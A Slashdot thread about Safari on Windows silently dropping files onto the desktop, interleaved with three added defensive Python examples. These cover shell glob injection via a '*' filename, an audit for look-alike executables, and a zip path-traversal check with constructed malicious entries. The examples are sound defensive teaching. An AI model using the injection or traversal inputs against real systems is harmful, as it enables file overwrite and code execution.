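The "rm with a filename of *" scenario above, as an added example that is not part of the thread: on a POSIX system the difference between handing a program a ready-made argv and handing a shell a string to re-split is exactly whether the attacker-chosen name gets globbed. The scratch directory and filenames are constructed here, and `ls` stands in for `rm` so nothing is destroyed. (On Windows, as the post says, the callee re-splits a single command line, so list-form argv is no guarantee there; this example only covers the Unix side.)

```python
"""Added example (not from the thread): why letting a shell re-parse an
attacker-controlled filename is dangerous, and how direct argv or quoting
avoids it.  POSIX only; uses `ls` instead of `rm` so nothing is deleted."""
import os
import shlex
import subprocess
import tempfile


def make_sandbox():
    """Create a scratch directory holding a few constructed files."""
    d = tempfile.mkdtemp(prefix="globdemo-")
    for name in ("report.doc", "photo.jpg", "notes.txt"):
        open(os.path.join(d, name), "w").close()
    return d


def run_ls(argv_or_cmdline, cwd, use_shell):
    """Run ls and return the set of names it printed (empty set on failure)."""
    proc = subprocess.run(argv_or_cmdline, cwd=cwd, shell=use_shell,
                          capture_output=True, text=True)
    if proc.returncode != 0:
        return set()
    return set(proc.stdout.split())


def unsafe_shell(filename, cwd):
    """Vulnerable: the shell re-parses the string, so '*' is globbed into every file."""
    return run_ls("ls " + filename, cwd, use_shell=True)


def safe_argv(filename, cwd):
    """Safe: argv is passed directly, so '*' is just a literal (nonexistent) name."""
    return run_ls(["ls", filename], cwd, use_shell=False)


def safe_quoted(filename, cwd):
    """Also safe: if a shell is unavoidable, shlex.quote neutralises metacharacters."""
    return run_ls("ls " + shlex.quote(filename), cwd, use_shell=True)


if __name__ == "__main__":
    d = make_sandbox()
    print("shell string  :", unsafe_shell("*", d))   # every file in the sandbox
    print("direct argv   :", safe_argv("*", d))      # set(): no file named '*'
    print("quoted string :", safe_quoted("*", d))    # set()
```

The same three calls with `rm` in place of `ls` would delete the whole directory in the first case and fail harmlessly in the other two, which is the browser-launches-a-helper risk the post describes.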
Also, if that's the case, apologies. Shows what I get for believing a Slashdot summary.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
> The worst thing that could happen from this is that your download area
> gets littered with superfluous files and you can fix that in seconds!
Howsabout a malicious website drops ***ONE*** malicious executable on your desktop? Let's say the malicious executable has a faked-up IE7 icon. Next Monday, the user starts up Windows, wants to browse "teh Interweb", clicks on the familiar IE7 icon on the desktop, and... oops. A well-coded malicious executable could even spawn the real IE7, to try to cover its tracks.
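A small audit for the dropped-look-alike-executable scenario described above, as an added example that is not part of the thread: it walks a desktop or download folder and flags files Windows would run on double-click, double extensions such as `invoice.pdf.scr`, and names that borrow a familiar program's name. The extension list, the look-alike names, and the sample folder are my own assumptions, not anything from the Microsoft advisory.

```python
"""Added example (not from the thread): flag files in a desktop/download
folder that an attacker could have dropped to be double-clicked later.
Extension list and look-alike names are assumed, not from the advisory."""
import os
import tempfile

# Extensions Windows will execute (or that can launch something) on double-click.
EXEC_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".vbs", ".js",
             ".hta", ".lnk", ".msi"}
# Names a dropped file might borrow to look like a familiar desktop icon (assumed).
LOOKALIKE_STEMS = {"internet explorer", "iexplore", "firefox", "safari",
                   "word", "ms word", "winword"}


def classify(filename):
    """Return a list of reasons this filename is suspicious (empty list if none)."""
    reasons = []
    parts = filename.lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in EXEC_EXTS:
        reasons.append("executable extension " + ext)
        # invoice.pdf.scr: a document-looking name with a runnable suffix
        if len(parts) > 2 and "." + parts[-2] not in EXEC_EXTS:
            reasons.append("double extension hides " + ext)
        if parts[0].strip() in LOOKALIKE_STEMS:
            reasons.append("name mimics a well-known program")
    return reasons


def audit_folder(path):
    """Map each suspicious filename directly under `path` to its reasons."""
    findings = {}
    for name in sorted(os.listdir(path)):
        if os.path.isfile(os.path.join(path, name)):
            reasons = classify(name)
            if reasons:
                findings[name] = reasons
    return findings


def make_sample_folder():
    """Constructed sample desktop: two benign files, two dropped executables."""
    d = tempfile.mkdtemp(prefix="desktop-")
    for name in ("holiday.jpg", "notes.txt",
                 "Internet Explorer.exe", "invoice.pdf.scr"):
        open(os.path.join(d, name), "w").close()
    return d


if __name__ == "__main__":
    for name, why in audit_folder(make_sample_folder()).items():
        print(name, "->", "; ".join(why))
```

Run it against the real desktop path instead of the sample folder to see what has accumulated; a name check is of course only a heuristic, and the underlying fix the thread is arguing about is not to let a web site choose where executables land in the first place.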
Windows has different security conventions than OSX. Apple needs to hire real Windows developers, rather than merely re-compiling Safari to a different target OS.
I'm not repeating myself
I'm an X window user; I'm an ex-Windows user
Because archives and disk images are extracted / opened by default in Safari on OS X? Same for videos and music files.
So if the extract utility accepts full paths (I doubt it does) for filenames you could extract whatever files on top of whatever files; you could, say, bring up a disk image with iTunes or whatever, and someone who doesn't think that much may execute it; and if it's possible to exploit iTunes or QuickTime through weird data in the files which are played, you could throw over a file which exploits that.
And so on, maybe not likely scenarios but whatever, I don't want thousands of files in my download folder to begin with, even if I won't execute them.
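The "does the extract utility accept full paths" question above, as an added example that is not part of the thread: a pre-extraction check that rejects any archive entry whose resolved destination would fall outside the chosen folder, whether through an absolute path or a `..` component. The archives are constructed in memory; the entry names are illustrative and not taken from any real sample.

```python
"""Added example (not from the thread): refuse to extract an archive whose
entries would write outside the destination folder (absolute paths or '..').
Sample archives are constructed in memory for the demonstration."""
import io
import os
import tempfile
import zipfile


def unsafe_entries(zip_bytes, dest):
    """Names in the archive whose extraction target would lie outside `dest`."""
    dest = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # os.path.join discards `dest` when `name` is absolute, so an
            # absolute entry resolves to itself and fails the prefix check.
            target = os.path.realpath(os.path.join(dest, name))
            inside = target == dest or target.startswith(dest + os.sep)
            if os.path.isabs(name) or name.startswith(("/", "\\")) or not inside:
                bad.append(name)
    return bad


def safe_extract(zip_bytes, dest):
    """Reject the whole archive if any entry escapes; otherwise extract and return names."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError("refusing archive with escaping entries: %r" % bad)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def build_archive(entries):
    """Construct an in-memory zip from a {name: content} dict (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)   # writestr keeps '..' and leading '/' as given
    return buf.getvalue()


# Constructed samples: one harmless archive, one that tries to escape.
BENIGN = {"readme.txt": "hello", "docs/notes.txt": "fine"}
MALICIOUS = {"readme.txt": "hello",
             "../../Desktop/iTunes.exe": "would land on the desktop",
             "/Applications/evil": "absolute path"}


if __name__ == "__main__":
    dest = tempfile.mkdtemp(prefix="extract-")
    print("benign   :", unsafe_entries(build_archive(BENIGN), dest))
    print("malicious:", unsafe_entries(build_archive(MALICIOUS), dest))
```

Rejecting the archive outright, rather than silently skipping the bad entries, is deliberate: an archive that tries to escape is evidence of hostility, and the remaining entries should not be trusted either.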
If you visit dodgy web sites and don't know how to secure your system you deserve all you get.
It seems that the real problem this is supposedly tickling, that made Microsoft go gaga, is ... Internet Explorer and security zones and active content (oh my!).
Which has been the #1 security problem in Windows since 1997, and I'm still boggled that Microsoft didn't back out the whole concept by 3Q98 or so. It's like having a car that's got door and ignition locks that only work if there's someone sitting in the driver's seat.
"Security Advisory (953818) does not refer to vulnerability in either Safari or Windows," Tim Rains, security response communications lead for Microsoft said in a statement sent to InternetNews.com.
"Rather, it describes a blended threat in which files may be downloaded to a user's machine without prompting, allowing them to be executed. This results from a combination of the default download location in Safari and how the Windows desktop handles executables."
What this tells me is that this is almost certainly another variant on the futile battle with reality that Microsoft has engaged in ever since they introduced "security zones" as an attempt to mitigate their fundamentally insecure "active content" security since 1997.
The rights granted an object MUST NOT be based on the location of the object (with or without such additional features as security dialogs, certificates, and whatnot), they MUST be granted by the component responsible for introducing them into the system, and ONLY by a request by the user... not in response to a request by the object.
That is, you MUST NOT be able to have an object in a web page executed outside a hard sandbox (eg, the kind of restricted scripts that web pages may contain) without a user explicitly downloading it AND explicitly executing it. The alternative was something unheard of before 1997, it was a joke (the "good times" virus, for example), the rare cases where someone found a way to make it happen (the Internet Worm, the XMAS TREE worm, the ghostscript virus) were identified as flaws, bugs, security holes, and unambiguously fixed.
Microsoft introduced the idea that a "trusted zone" could exist where execution could be implicitly allowed, by visiting a web page, opening a folder, even reading email! This led to a flood of worms in the last few years of the 20th century, and for whatever reason Microsoft... rather than backing out of this model... has attempted to come up with some combination of tricks to fix it. It can't be fixed, alas, and until Microsoft admits it or people stop using Microsoft software security is going to remain problematic... ANY application on Windows can unintentionally break Microsoft's undocumented and rapidly changing trust boundaries and introduce another avenue of attack.
Worse, other companies... including Apple and Mozilla... have followed Microsoft's lead. All browsers currently have design flaws like this, though none take it to such an extreme and only Microsoft seems insistent on carrying the mistake all the way to the desktop.
My GF came across one of these malicious file bombing sites and apparently I found it a little late. I use(d) Safari & Time Warner Cable Broadband Services which now makes us pay by the amount of bandwidth used (TX). I found a little over 17GB sitting on my system and a hell of a bill from Time Warner's new bandwidth limitations.
Any chance I can get out of paying these overages?